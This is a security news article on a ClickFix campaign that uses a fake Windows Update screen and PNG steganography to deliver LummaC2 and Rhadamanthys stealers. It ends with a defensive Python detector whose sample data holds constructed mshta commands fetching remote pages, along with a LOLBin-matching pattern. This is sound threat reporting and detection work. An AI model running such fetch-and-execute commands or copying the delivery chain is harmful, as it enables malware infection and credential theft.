A new ClickFix variant has been observed in which attackers show a convincing Windows Update animation on a full-screen browser page to trick users into running attacker-supplied commands, while the final malware payload is hidden inside image files.
[Image: Fullscreen browser page]
Since the beginning of October, security researchers have documented instances of ClickFix attacks that leverage the guise of installing critical Windows security updates, alongside the more prevalent “human verification” lure. Victims are directed to follow specific key sequences that inadvertently paste and execute commands from the attackers, with the malicious code being copied to the clipboard through JavaScript running on the fraudulent site.
[Image source: BleepingComputer]
A report from Huntress, a managed security services provider, reveals that these new ClickFix variants deploy the LummaC2 and Rhadamanthys information stealers. In one variant, a human verification page is utilized, while another relies on the deceptive Windows Update screen. In both scenarios, the attackers employ steganography to embed the final malware payload within an image file.
According to Huntress researchers, instead of merely appending malicious data to a file, the attackers encode the harmful code directly within the pixel data of PNG images, utilizing specific color channels to reconstruct and decrypt the payload in memory. The delivery of the final payload begins with the execution of malicious JavaScript code via the mshta Windows-native binary.
This process unfolds in multiple stages, involving PowerShell code and a .NET assembly known as the Stego Loader, which is tasked with reconstructing the final payload embedded in an encrypted PNG file. The Stego Loader's manifest resources contain an AES-encrypted blob that, once decrypted, is the steganographic PNG file carrying the shellcode; custom C# code reconstructs the shellcode from it.
Researchers have identified a dynamic evasion tactic employed by the threat actor, referred to as ctrampoline, where the entry point function initiates calls to 10,000 empty functions, further complicating detection efforts.
[Image source: Huntress]
The shellcode extracted from the encrypted image carries the infostealer and is packed with the Donut tool, which can run VBScript, JScript, EXE and DLL files, and .NET assemblies directly in memory. After unpacking it, Huntress researchers retrieved the malware itself, the LummaC2 and Rhadamanthys samples, during their analysis of the attacks.
Visual representations of the attack process illustrate the complexity and sophistication of these ClickFix variants.
[Image source: Huntress]
The Rhadamanthys variant, which employed the Windows Update lure, was first detected by researchers in October, prior to a significant law enforcement operation known as Operation Endgame that dismantled parts of its infrastructure on November 13. Following this operation, Huntress reports that the payload is no longer being delivered through the fake Windows Update domains, although these domains remain active.
To mitigate the risks associated with ClickFix attacks, researchers advise disabling the Windows Run box and keeping a vigilant eye on suspicious process chains, such as explorer.exe spawning mshta.exe or PowerShell. Additionally, cybersecurity analysts investigating incidents can examine the RunMRU registry key to determine if users have entered any commands in the Windows Run box.
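The two checks above, as an added example that is not part of the article or of Huntress's tooling: a detector for explorer.exe spawning mshta or PowerShell, run over constructed process-creation records in the shape of Sysmon Event ID 1 fields, and a decoder for values exported from HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU (each Run-box command is stored as a one-letter value ending in "\1", ordered by MRUList). The example.invalid hosts and the sample entries are constructed.

```python
import re

SUSPECT_CHILDREN = {"mshta.exe", "powershell.exe", "pwsh.exe"}

# Constructed process-creation records (Sysmon Event ID 1 field names).
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": "mshta https://example.invalid/verify"},   # constructed host
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Program Files\Notepad++\notepad++.exe",
     "CommandLine": "notepad++.exe notes.txt"},
    {"ParentImage": r"C:\Windows\System32\cmd.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell -File build.ps1"},
]

def basename(path: str) -> str:
    """Lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()

def suspicious_chains(events):
    """Events where explorer.exe (which hosts the Run box) spawns mshta or PowerShell."""
    return [e for e in events
            if basename(e["ParentImage"]) == "explorer.exe"
            and basename(e["Image"]) in SUSPECT_CHILDREN]

# Constructed RunMRU export: MRUList lists value names most-recent-first,
# and each command is stored with a trailing "\1".
SAMPLE_RUNMRU = {
    "MRUList": "cab",
    "a": "notepad\\1",
    "b": "calc\\1",
    "c": "mshta https://example.invalid/update\\1",   # constructed host
}

def runmru_history(values):
    """Run-box commands in most-recent-first order with the '\\1' suffix stripped."""
    history = []
    for name in values.get("MRUList", ""):
        if name in values:
            cmd = values[name]
            history.append(cmd[:-2] if cmd.endswith("\\1") else cmd)
    return history

def flag_runmru(values, pattern=r"\b(mshta|powershell|pwsh|cmd)\b"):
    """Run-box commands that invoke the LOLBins seen in the ClickFix chain."""
    return [c for c in runmru_history(values) if re.search(pattern, c, re.IGNORECASE)]

if __name__ == "__main__":
    for e in suspicious_chains(SAMPLE_EVENTS):
        print("suspicious chain:", e["ParentImage"], "->", e["CommandLine"])
    for c in flag_runmru(SAMPLE_RUNMRU):
        print("suspicious RunMRU entry:", c)
```

On a live system the RunMRU dictionary would come from exporting that key (or from the user's NTUSER.DAT in forensic imaging) rather than from the constructed sample.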